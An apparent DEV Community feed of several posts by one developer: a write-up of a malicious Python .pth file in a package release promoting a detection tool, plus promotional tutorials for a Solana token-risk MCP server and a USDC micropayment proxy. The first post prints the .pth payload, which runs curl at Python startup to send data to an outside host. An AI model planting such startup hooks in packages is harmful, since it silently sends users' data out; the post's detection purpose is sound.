DEV Community: 0xAllenDev

How .pth Files Became a Supply Chain Weapon (and How to Detect Them)

0xAllenDev — Thu, 26 Mar 2026 01:54:07 +0000

The Attack That Started It

On March 24, 2026, LiteLLM 1.82.7 was published to PyPI. It contained a file called litellm_init.pth:

import subprocess, sys
subprocess.Popen(
    ['curl', '-s', 'https://models.litellm.cloud/beacon', '-d', sys.version],
    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL
)

This wasn't in the main code. It was in a .pth file.

What Are .pth Files?

Python's .pth (path) files live in site-packages/ and execute every time you start Python — not just during pip install.

Most developers don't know this. Attackers do.

Why Other Scanners Missed It

Tool	.pth Analysis
pip-audit	❌ CVE database only
Safety	❌ Known vulnerabilities
Trivy	❌ SBOM + CVE
socket.dev	❌ Not detected
chaincanary	✅ Semantic classifier

How chaincanary Works

Instead of flagging all .pth files, chaincanary classifies them:

EMPTY → silent
PATH_ONLY → silent  
SAFE_CODE → LOW warning
DANGEROUS → CRITICAL → MALICIOUS

The LiteLLM file? subprocess.Popen(['curl', ...]) → DANGEROUS.

Demo

pip install chaincanary
chaincanary check litellm 1.82.7

Output:

🔍 chaincanary — Analyzing litellm==1.82.7

╭──────────┬──────────────────┬──────────────────────────────╮
│ Severity │ Rule             │ Title                        │
├──────────┼──────────────────┼──────────────────────────────┤
│ CRITICAL │ PTH_FILE_INSTALL │ .pth file installs code...   │
│ CRITICAL │ PTH_NETWORK      │ phone-home on startup        │
│ CRITICAL │ PTH_SUBPROCESS   │ subprocess on startup        │
╰──────────┴──────────────────┴──────────────────────────────╯

Score: 10.0 / 10.0
Verdict: ██ MALICIOUS

CI Integration

Add to your GitHub Actions:

- uses: AetherCore-Dev/chaincanary@v0.1.0
  with:
    requirements: requirements.txt
    fail-on: MALICIOUS

The Philosophy

No account required
No data leaves your machine
No Docker, no sandbox, no root
Pure Python static analysis

Try It

pip install chaincanary
chaincanary check litellm 1.82.7
chaincanary audit requirements.txt

GitHub: https://github.com/AetherCore-Dev/chaincanary

Built after a real attack. Hope it helps you stay safe.

I Built an AI Agent That Checks If a Solana Token Is a Rug Pull — Before You Buy

0xAllenDev — Wed, 11 Mar 2026 14:31:08 +0000

I Built an AI Agent That Checks If a Solana Token Is a Rug Pull — Before You Buy

The ugly truth: a large percentage of new Solana tokens are scams or honeypots — industry estimates range from 60-80%, depending on the data source and time period. I learned this the hard way. So I built an MCP server that checks any token's risk score in real-time — and makes AI agents actually use it before trading.

The Problem

I was building an AI trading agent. It was supposed to be smart: analyze tokens, detect trends, execute trades.

Then I fed it a token that looked legitimate. Clean contract. Decent liquidity. A website with a roadmap and a Telegram link that had 5,000 members.

The agent bought in.

The token was a rug pull. $2,400 gone in 11 minutes.

That's when I understood the uncomfortable truth: AI agents can analyze sentiment, write code, and debug — but they can't verify if a token is a scam. They have no way to check:

Is the liquidity locked or burnable?
Does the contract have a mint function that lets the owner print infinite tokens?
Are top holders dumping on the community?

Existing tools exist for humans. RugCheck.xyz. DexScreener. GoPlus Security. But they're all separate APIs, different response formats, and none of them expose an interface an AI agent can actually use autonomously.

So I built one.

What I Built: Token RugCheck MCP Server

token-rugcheck is an MCP server that gives AI agents the ability to audit any Solana token before trading. It's a middleware that:

Fetches from 3 data sources in parallel: RugCheck.xyz, DexScreener, and GoPlus Security
Runs deterministic risk rules: 10 rules covering mint authority, liquidity protection, holder concentration, sell pressure, and more
Returns a three-layer report: Machine-readable verdict + LLM-friendly analysis + raw evidence for humans to verify

Your AI Agent          Token RugCheck
      │                      │
      │  GET /v1/audit/{mint}│
      ├─────────────────────▶│
      │                      │
      │  402 Payment (0.02 USDC)
      │◀─────────────────────┤
      │                      │
      │  USDC on Solana      │
      ├─────────────────────▶│
      │                      │
      │  200 OK + Report    │
      │◀─────────────────────┤
      │                      │
      │ is_safe: false      │
      │ risk_score: 85      │
      │ risk_level: CRITICAL│
      │ red_flags: [...]    │

The Three-Layer Report

Most token scanners give you a number. I wanted more:

Layer	For	Content
Action	Machines	`is_safe` (bool), `risk_score` (0-100), `risk_level` (SAFE/LOW/MEDIUM/HIGH/CRITICAL)
Analysis	LLMs	Summary, red flags, green flags — in natural language the agent can reason about
Evidence	Humans	Raw numbers: liquidity, holder distribution, mint/freeze authority, price, volume

The agent can read the summary and make a decision, but a human can also verify the raw data to catch edge cases the rules might miss.

How the Risk Engine Works

I didn't want to rely on an LLM for the core judgment. LLMs are great for analysis, but they're inconsistent for binary safety decisions. Instead, I implemented 10 deterministic rules that have been validated against the real Solana ecosystem:

Critical Rules (any = extreme danger)

Mintable (+40): Contract has active mint authority — owner can inflate supply at will
LP Unprotected (+35): Liquidity pool is neither burned nor sufficiently locked
Freezable (+30): Contract has freeze authority — owner can freeze any holder's tokens

High Rules

Top 10 Concentrated (+25): Top 10 holders control >80% of supply
Low Liquidity (+20): Less than $10K liquidity — easily manipulated
Sell Pressure (+15): 24h sells >3x buys — possible coordinated dump

Medium Rules

Very New Pair (+10): Trading pair created <24 hours ago
Low Volume (+5): 24h volume <$1,000

Low Rules (informational)

Metadata Mutable (+3): Token metadata can be changed (common on Solana)
Closable (+3): Contract has close authority (usually for rent reclamation)

Liquidity exemption: Tokens with ≥$1M liquidity are exempt from LP-protection and holder-concentration rules. High liquidity itself is a strong anti-rug signal for established tokens like BONK, WIF, and JUP.

Pricing: $0.02 USDC Per Audit

The service costs $0.02 USDC per audit, powered by ag402 — a payment layer that implements Coinbase's x402 protocol on Solana.

Why this price point?

It's 50% cheaper than the closest competitor (rug-munch-mcp charges $0.04 for basic checks)
It's enough to prevent spam/abuse but not so high that users hesitate
It's automated: the AI agent pays automatically via the x402 protocol, no API keys required

There's also a free tier: 20 requests per IP per day, for users who just want to check a few tokens.

Integration: One Line of Code

The whole point is that the agent actually uses it before trading. Here's what that looks like in practice:

import ag402_core
ag402_core.enable()  # Auto-handles 402 → pay → retry

async with httpx.AsyncClient() as client:
    resp = await client.get(
        "https://rugcheck.aethercore.dev/v1/audit/DezXAZ8z7PnrnRJjz3wXBoRgixCa6xjnB7YaB1pPB263"
    )
    report = resp.json()

    if report["action"]["is_safe"]:
        # Execute the trade
        await execute_trade(report["action"]["risk_score"])
    else:
        print(f"SKIPPED — {report['analysis']['summary']}")
        for flag in report["analysis"]["red_flags"]:
            print(f"  🚩 {flag['message']}")

The agent receives the report, reads the summary, and makes a decision. The safety check is no longer optional — it's built into the flow.

TypeScript Support

Not using Python? ag402 also ships a TypeScript SDK:

npm install @ag402/fetch

import { createX402Fetch, InMemoryWallet } from "@ag402/fetch";

const apiFetch = createX402Fetch({
  wallet: new InMemoryWallet(100),
});

const res = await apiFetch("https://rugcheck.aethercore.dev/v1/audit/DezXAZ8z7PnrnRJjz3wXBoRgixCa6xjnB7YaB1pPB263");

What I Got Wrong (And Fixed)

Building this taught me some hard lessons:

Data source priority matters: I initially merged data arbitrarily, but discovered RugCheck's liquidity data is more reliable than DexScreener's for older pairs, while DexScreener has better real-time volume data. I now use a priority merge: RugCheck → DexScreener → GoPlus.
Graceful degradation is critical: If all three upstream APIs fail, returning is_safe: true would be catastrophic. I now return a degraded report with risk_score: 100 and a warning when all sources fail, forcing human intervention.
Solana's "closable" is misunderstood: Many scanners flag "closable" as HIGH risk, but on Solana this typically refers to rent reclamation, not token theft. I demoted it to LOW.
Cache TTL matters for rug pulls: By the time a rug pull happens, the token's data might still be cached. I use a 3-second TTL for non-degraded reports and a 10-second TTL for degraded reports — short enough to catch rapid changes, long enough to reduce upstream API load.

The Bigger Picture

This isn't just about my tool. It's about a fundamental capability gap: AI agents can execute financial transactions but can't verify if they're safe.

We're building trillion-dollar agent economies, but the safety infrastructure is missing. Before agents can trade autonomously, they need:

✅ Identity verification (who owns the wallet?)
✅ Risk assessment (is this token a scam?)
✅ Limit enforcement (how much can I lose?)

Token RugCheck solves the second problem. What's next — wallet reputation scoring? Transaction simulation? I'd love to hear what you'd build on top.

Try It Now

No signup required. 20 free audits per day:

curl https://rugcheck.aethercore.dev/v1/audit/DezXAZ8z7PnrnRJjz3wXBoRgixCa6xjnB7YaB1pPB263

Or install the MCP server and give your AI agent autonomous audit capabilities:

pip install "ag402-core[crypto]" httpx
python -m rugcheck.main &  # Start the server

The code is open source (MIT). Build on it. Break it. Improve it.

GitHub: AetherCore-Dev/token-rugcheck
Live API: rugcheck.aethercore.dev
Glama: glama.ai/mcp/servers/AetherCore-Dev/token-rugcheck

Disclaimer: Not financial advice. Automated token analysis has limitations — always do your own research.

Build a Paid MCP Server in 5 Minutes (Full Tutorial)

0xAllenDev — Tue, 10 Mar 2026 13:49:48 +0000

Build a Paid MCP Server in 5 Minutes (Full Tutorial)

From zero to earning USDC — a complete walkthrough with working code.

You have an MCP server. It works. Now make it pay you.

This tutorial takes you from pip install to a working paid MCP server in under 5 minutes. We'll build a weather service, put a USDC paywall on it, and test the full buyer-seller flow.

No prior crypto experience needed.

What You'll Need

Python 3.10+
Two terminal windows
5 minutes

python3 --version
# Python 3.10.x or higher ✓

Step 1: Install (30 seconds)

pip install ag402-core fastmcp

Verify:

ag402 --version

This installs the ag402 CLI (wallet management + reverse proxy), the ag402_core Python SDK (buyer-side auto-payment), and fastmcp (for our demo server).

Step 2: Create Your Wallet (30 seconds)

ag402 init

This generates a Solana keypair and loads it with test USDC for development. Wallet details are stored encrypted at ~/.ag402/wallet.json.

Save your wallet address — you'll need it in Step 4.

In test mode, ag402 mints devnet USDC so you can experiment for free. For production, set X402_MODE=production and fund with real USDC.

Step 3: Build a Simple MCP Server (2 minutes)

mkdir my-paid-mcp && cd my-paid-mcp

Create weather_server.py:

from fastmcp import FastMCP

mcp = FastMCP("Weather Service")

WEATHER_DATA = {
    "san francisco": {"temp_c": 18, "condition": "foggy", "humidity": 75},
    "new york":      {"temp_c": 22, "condition": "sunny", "humidity": 45},
    "tokyo":         {"temp_c": 25, "condition": "cloudy", "humidity": 60},
    "london":        {"temp_c": 15, "condition": "rainy", "humidity": 82},
}

@mcp.tool()
def get_weather(city: str) -> dict:
    """Get current weather for a city."""
    data = WEATHER_DATA.get(city.lower())
    if not data:
        return {"error": f"No data for {city}"}
    return {"city": city, **data}

if __name__ == "__main__":
    # Use HTTP transport so ag402 can proxy requests
    mcp.run(transport="streamable-http", port=3000)

Start in Terminal 1:

python weather_server.py
# Server running on http://localhost:3000

Why not stdio? ag402's reverse proxy needs an HTTP endpoint to sit in front of. The stdio transport communicates via stdin/stdout, which can't be proxied. streamable-http exposes your MCP server as a standard HTTP service. If your MCP server already runs on HTTP (e.g., behind Flask or FastAPI), skip this step and point ag402 at your existing endpoint.

Step 4: Add the Paywall (30 seconds)

Open Terminal 2:

ag402 serve \
  --target http://localhost:3000 \
  --price 0.02 \
  --address <YOUR_WALLET_ADDRESS>

┌─────────────────────────────────────┐
│  🚀 ag402 Payment Proxy            │
│  ─────────────────────────────────  │
│  🎯 Target:  http://localhost:3000  │
│  💵 Price:   0.02 USDC/request     │
│  🔗 Proxy:   http://localhost:4020  │
└─────────────────────────────────────┘

Done. Here's what happens on each request:

Agent → :4020 → payment header? ─── No ──→ 402 + price/wallet info
                    │                          ↑
                   Yes                    Agent auto-pays
                    │                     USDC on Solana
                    ▼                          │
              Verify on-chain ←────────────────┘
                    │
                    ▼
         Forward to :3000 (your MCP)
                    │
                    ▼
              Response ✓

Your MCP code: zero changes.

Step 5: Test as a Buyer (1 minute)

Create test_buyer.py:

import ag402_core
import httpx

# One line — patches httpx/requests to auto-pay 402s
ag402_core.enable()

response = httpx.post(
    "http://localhost:4020/mcp",
    json={
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {
            "name": "get_weather",
            "arguments": {"city": "Tokyo"}
        }
    }
)

print(response.json())

python test_buyer.py

Behind the scenes: httpx hits proxy → gets 402 → ag402_core intercepts → auto-pays $0.02 USDC (~0.5s) → retries with proof → weather data ✓

The buyer code has zero payment logic. Even simpler — wrap any existing script:

ag402 run -- python my_existing_agent.py

Bonus: Prepaid Mode (~1ms)

Standard payments take ~0.5s. ag402's prepaid system drops that to ~1ms with zero gas:

One Solana tx → buy N credits → HMAC credential
Each call → credential header → local verify → ~1ms, $0 gas

Package	Credits	Price	Per call	Validity
Starter	100	$1.50	$0.015	3 days
Basic	500	$5.00	$0.010	7 days
Pro	1,000	$8.00	$0.008	30 days
Business	5,000	$35.00	$0.007	365 days
Enterprise	10,000	$60.00	$0.006	730 days

HMAC-SHA256 verified locally — no blockchain calls after the initial purchase. (How prepaid works under the hood)

Bonus: Production

Mainnet:

X402_MODE=production ag402 serve \
  --target http://your-server:3000 \
  --price 0.02 \
  --address <YourMainnetAddress>

Claude Code / Cursor:

ag402 install claude-code   # or: ag402 install cursor

TypeScript Support

Not using Python? ag402 also ships a TypeScript SDK:

npm install @ag402/fetch

import { createX402Fetch, InMemoryWallet } from "@ag402/fetch";

const apiFetch = createX402Fetch({
  wallet: new InMemoryWallet(100),
});

const res = await apiFetch("https://your-api.com/endpoint");

Troubleshooting

Problem	Fix
`ag402 init` fails	Ensure Python 3.10+ and pip is current
Proxy can't reach target	Confirm MCP server is running on the correct port
Payment not going through	`ag402 init` provides test USDC — run again if needed
402 but no auto-pay	`ag402_core.enable()` must be called before HTTP requests
Import errors	`pip install --upgrade ag402-core`

Limitations

Buyers need a Solana wallet with USDC — this is real friction for non-crypto developers. Test mode removes this barrier for development, and prepaid reduces on-chain interactions, but production buyers need crypto.
Solana network dependency — standard payments require network availability. Prepaid mode (HMAC-based) works independently of the network after the initial purchase.
Simple pricing only — ag402 handles per-request pricing. For subscriptions, usage tiers, or invoicing, you'll need additional tooling.

Security Checklist (Before Production)

[ ] Private key in environment variable (SOLANA_PRIVATE_KEY), never in code
[ ] Tested on devnet before mainnet
[ ] Price set slightly above your per-request cost
[ ] Reviewed built-in protections: per-tx cap ($5), rate limit, daily cap ($10), circuit breaker, auto-rollback, key redaction
[ ] 775+ tests, 4 internal security reviews, MIT licensed → GitHub

What We Built

Step	Time	Result
Install	30s	ag402 + FastMCP ready
Wallet	30s	Solana wallet + test USDC
MCP server	2min	Weather service on `:3000`
Paywall	30s	Reverse proxy on `:4020`
Test	1min	Auto-pay verified ✓

Your server code: unchanged. Your revenue: non-zero.

Next Steps

→ ⭐ ag402 on GitHub — source, docs, examples
→ 🧪 Colab demo — try in browser, zero install
→ 📖 Why charge? — the business case
→ 📝 Case study — real lessons from a $0.02 paywall

ag402 is open source (MIT). Built by AetherCore on Coinbase x402.

I Put a $0.02 Paywall on My AI API. Here's What I Learned.

0xAllenDev — Tue, 10 Mar 2026 13:49:46 +0000

I built an MCP server that audits Solana tokens for rug pulls. It calls three external APIs per request, runs results through an LLM, and generates a risk report.

Every audit costs me about $0.015 to run. I knew from the start that offering it for free wasn't sustainable — one popular agent could burn through my API budget in hours. But I also didn't want to spend weeks building billing infrastructure for a side project.

Here's what I did instead.

The Cost Problem

Token RugCheck pulls data from three sources per audit:

Source	Purpose	My cost
RugCheck.xyz	On-chain risk signals	~$0.005
GoPlus Security	Contract audit data	~$0.003
LLM analysis	Synthesize findings	~$0.008

Total: ~$0.015 per request. DexScreener is free but rate-limited.

At even moderate traffic, this burns real money on a project with zero revenue. And the users aren't humans clicking buttons — they're autonomous AI agents. Traditional billing doesn't fit.

Why x402 Over Stripe

Stripe charges 2.9% + $0.30 per transaction. On a $0.02 payment, that's $0.31 — literally 1,500% of my revenue. Beyond fees, Stripe requires business registration, KYC, webhooks, and a billing dashboard. Weeks of work for a solo dev.

But the real blocker: AI agents can't fill out Stripe checkout forms. They need to pay programmatically, without accounts or API keys.

Coinbase's x402 protocol solves this. Like HTTP 401 means "authenticate," 402 means "pay." The server publishes payment terms, the client pays automatically. I found ag402, a Python SDK that implements x402 on Solana. Setup:

pip install ag402-core
ag402 init
ag402 serve --target http://localhost:8000 --price 0.02 --address <MyWallet>

ag402 runs as a reverse proxy. My audit engine code didn't change at all.

First Real Payment

Deployed to mainnet. Two days later:

3QPqd3...hnVPn — an AI agent paid $0.02 USDC for a token audit. Gas: $0.00025. Settlement: under a second.

Click that link. Verify it on Solscan. It's real.

I also added a free tier: 20 requests per day per IP, no wallet needed. It lets developers try the service before committing any USDC — and it's enough for casual use.

Three Problems I Hit (and Fixed)

1. Latency

Standard x402 needs on-chain confirmation per request: ~0.5 seconds. Acceptable for single calls, but agents making batch requests noticed the delay.

Fix: ag402's prepaid system. One on-chain payment buys N credits. Subsequent calls use HMAC-SHA256 credentials verified locally in ~1ms. Zero gas after the initial purchase.

Package	Credits	Price	Per call	Validity
Starter	100	$1.50	$0.015	3 days
Basic	500	$5.00	$0.010	7 days
Pro	1,000	$8.00	$0.008	30 days
Business	5,000	$35.00	$0.007	365 days
Enterprise	10,000	$60.00	$0.006	730 days

At 1ms, prepaid is indistinguishable from a free API.

2. Buyer Friction

Asking every agent developer to write payment integration code is a non-starter.

Fix: One line on the buyer side:

import ag402_core; ag402_core.enable()

Or zero code changes:

ag402 run -- python my_agent.py

The agent's HTTP library is patched transparently. Every 402 response is intercepted, paid, and retried. The developer writes zero payment logic.

TypeScript Support

Not using Python? ag402 also ships a TypeScript SDK:

npm install @ag402/fetch

import { createX402Fetch, InMemoryWallet } from "@ag402/fetch";

const apiFetch = createX402Fetch({
  wallet: new InMemoryWallet(100),
});

const res = await apiFetch("https://your-api.com/endpoint");

3. The Crypto Barrier

This is the honest part: not everyone has a Solana wallet with USDC. If your audience is traditional web developers who've never touched crypto, this is real friction.

What helped:

ag402's test mode provides devnet USDC for free — developers can try without buying crypto
The prepaid system means buyers only need one on-chain interaction, not one per request
As stablecoin adoption grows (Coinbase, Stripe, PayPal all support USDC now), this barrier is shrinking

But it's still a barrier today. If your users are exclusively non-crypto, this approach adds friction that API keys don't.

What I Got Wrong

I underestimated documentation. The first version had minimal docs. Developers who found Token RugCheck couldn't figure out the payment flow without reading source code. I spent more time answering questions than writing features. Lesson: for anything involving money, documentation needs to be 3x better than you think.

I should have launched on testnet publicly first. Going straight to mainnet meant my first users were also my beta testers — with real money on the line. A public testnet period would have caught edge cases without the stress.

Pricing is harder than building. $0.02 felt right (slightly above my $0.015 cost), but I had no data to validate it. Should I charge more for complex tokens? Less for repeat customers? ag402 supports per-request pricing, but I'm still figuring out the optimal strategy.

Three Things I'd Do Differently

Start with prepaid from day one. Per-request on-chain payments work, but prepaid is better for everyone — faster for buyers, more predictable revenue for sellers, lower total gas.

Price for value, not cost. I priced at cost-plus. But the value of knowing a token is safe before buying $10K worth? That's worth more than $0.02. Start by proving demand, then price for value.

Be upfront about charging. I put the price, protocol, and verification links right in the README. No hidden paywalls, no surprise fees. Developers respect transparency — it builds trust faster than any marketing copy.

The Takeaway

Five things I know now:

ag402 serve wraps your existing server in a paywall — zero code changes
Solana micropayments: $0.00025/tx, 0.5s settlement
Prepaid mode: 1ms latency, zero gas
The crypto wallet requirement is real friction — but shrinking
It works. It's on mainnet. Verify it yourself

The question isn't whether AI agents will pay for APIs. They already are.

The question is whether your API is on the list.

Links:
→ ag402 — payment middleware (MIT)
→ Token RugCheck — live on mainnet
→ x402 protocol — by Coinbase
→ @AetherCoreDev on X
→ Want to try it? Full tutorial here

Your MCP Server Has Users. You're Paying Their Bill.

0xAllenDev — Tue, 10 Mar 2026 13:49:45 +0000

Your MCP Server Has Users. You're Paying Their Bill.

How to add USDC micropayments to any MCP server in 60 seconds — no Stripe, no API keys, no code changes.

The Problem

You built an MCP server. People use it. Claude Code calls it. Cursor calls it. LangChain agents call it.

Every call costs you money — proxies, LLM tokens, compute, third-party API fees. AI agents consume your resources for free.

You've considered charging. Here's why the obvious options fail for micropayments:

Solution	Fee on a $0.02 call	The problem
Stripe	$0.31 (2.9% + $0.30)	1,500% fee — they earn more than you
PayPal	$0.31 (2.9% + $0.30)	Same math, same problem
API keys	$0 fees	Agents can't self-register; you manage keys
ag402 (Solana USDC)	$0.00025	1.25% fee — agents auto-pay, no signup

The core issue: AI agents can't sign up for accounts. They can't fill checkout forms or manage API keys across dozens of services. Payment needs to be programmatic and invisible.

Three Commands

pip install ag402-core
ag402 init                    # Creates Solana wallet + test USDC
ag402 serve \
  --target http://localhost:3000 \
  --price 0.02 \
  --address <YourSolanaAddress>

Your MCP server now charges $0.02 USDC per request. Your code? Untouched.

                    ┌─────────────────────────────┐
Agent request ──→  │  ag402 reverse proxy (:4020) │
                    │  ┌─────────────────────┐    │
                    │  │ 1. Check payment    │    │
                    │  │ 2. If none → 402    │    │
                    │  │ 3. Agent auto-pays  │    │
                    │  │ 4. Verify on Solana │    │
                    │  │ 5. Forward request  │    │
                    │  └─────────────────────┘    │
                    └──────────┬──────────────────┘
                               │
                    ┌──────────▼──────────┐
                    │ Your MCP Server     │
                    │ (unchanged code)    │
                    └─────────────────────┘

ag402 is a reverse proxy. It sits in front of your server and handles everything. (Step-by-step tutorial)

Buyers Don't Notice

On the agent side:

import ag402_core; ag402_core.enable()

Or zero code changes:

ag402 run -- python my_agent.py

Every 402 is intercepted → paid → retried. Works with LangChain, AutoGen, CrewAI, Semantic Kernel — anything on httpx or requests.

TypeScript Support

Not using Python? ag402 also ships a TypeScript SDK:

npm install @ag402/fetch

import { createX402Fetch, InMemoryWallet } from "@ag402/fetch";

const apiFetch = createX402Fetch({
  wallet: new InMemoryWallet(100),
});

const res = await apiFetch("https://your-api.com/endpoint");

Speed

Standard: ~0.5s per payment (on-chain Solana USDC)
Prepaid mode: ~1ms — one on-chain payment buys HMAC credentials, subsequent calls verify locally with zero gas

Prepaid is indistinguishable from a free API in terms of latency. (Technical deep-dive)

Running on Mainnet

Token RugCheck audits Solana tokens for rug pull risks — live on mainnet with real USDC payments.

$0.02/audit · RugCheck.xyz + DexScreener + GoPlus → 3-layer risk report
Free tier: 20 requests/day per IP — no wallet needed to get started
Verified tx: 3QPqd3...hnVPn (verify on Solscan)

Revenue Projections

Hypothetical estimates — actual results depend on your traffic and pricing.

Price/call	100 calls/day	500 calls/day	1,000 calls/day
$0.01	$30/mo	$150/mo	$300/mo
$0.02	$60/mo	$300/mo	$600/mo
$0.05	$150/mo	$750/mo	$1,500/mo

Non-custodial — USDC goes directly to your Solana address. Only fee: ~$0.00025 network fee.

When NOT to Use This

Be honest about the tradeoffs:

Your users don't have crypto wallets: ag402 requires buyers to hold Solana USDC. If your audience is non-crypto developers, this is a barrier. (The prepaid system reduces but doesn't eliminate this.)
Solana network outages: Solana has had downtime events. Standard payments depend on network availability. (Prepaid mode works offline since it's HMAC-based.)
Regulatory uncertainty: USDC is a regulated stablecoin, but crypto payment rules vary by jurisdiction.
You need complex billing: Subscriptions, usage tiers, invoices — ag402 handles simple per-request pricing. For complex billing, you may still need Stripe alongside.

Security

Real money means real security:

4 internal security reviews · 24 issues found, 24 fixed
775+ tests · 90%+ coverage
6-layer budget protection · per-tx cap ($5), rate limit, daily cap ($10), circuit breaker, auto-rollback, key redaction
Non-custodial · private keys never leave your machine
Zero telemetry · no tracking, no analytics

MIT licensed → audit the source

Get Started

pip install ag402-core && ag402 init && ag402 serve --target http://your-mcp:3000 --price 0.02 --address <Addr>

→ GitHub ⭐ · Live on mainnet · Colab demo · @AetherCoreDev

Open source (MIT). Built on Coinbase x402.